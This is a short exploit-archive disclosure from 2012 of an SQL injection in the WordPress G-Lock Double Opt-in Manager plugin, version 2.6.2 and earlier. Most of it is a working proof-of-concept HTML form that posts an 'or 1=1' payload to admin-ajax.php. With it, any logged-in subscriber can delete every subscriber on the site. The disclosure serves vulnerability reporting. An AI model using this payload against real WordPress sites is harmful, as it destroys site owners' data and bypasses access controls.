Home / exploits WordPress G-Lock Double Opt-in Manager 2.6.2 SQL Injection
Posted on 01 August 2012
============================================================================ WordPress G-Lock Double Opt-in Manager Plugin SQL Injection version <= 2.6.2 ============================================================================ sql injection in file ajaxbackend.php line 519 and 817 u must be logd in (subscriber or anything) u post data "action" = "gsom_aj_delete_subscriber" or "gsom_aj_unsubscribe" and data "json" = array in json here is html example. log in to wordpress and then go to this document: <html> <form method="post" action="http://myserver/wp-admin/admin-ajax.php"> <input type="text" name="action" value="gsom_aj_delete_subscriber"> <input type="text" name="json" value="["intId or 1=1"]"> <input type="text" name="_" value=""> <input type="submit"> </form> </html> the admin-ajax will run the ajaxbackend eventually, and then all subscribers will be deleted, even though u r only a subscriber user!!! ============================================================================ found by::: BEASTIAN greetings to:: PRIZMA - SPACE ACE ============================================================================
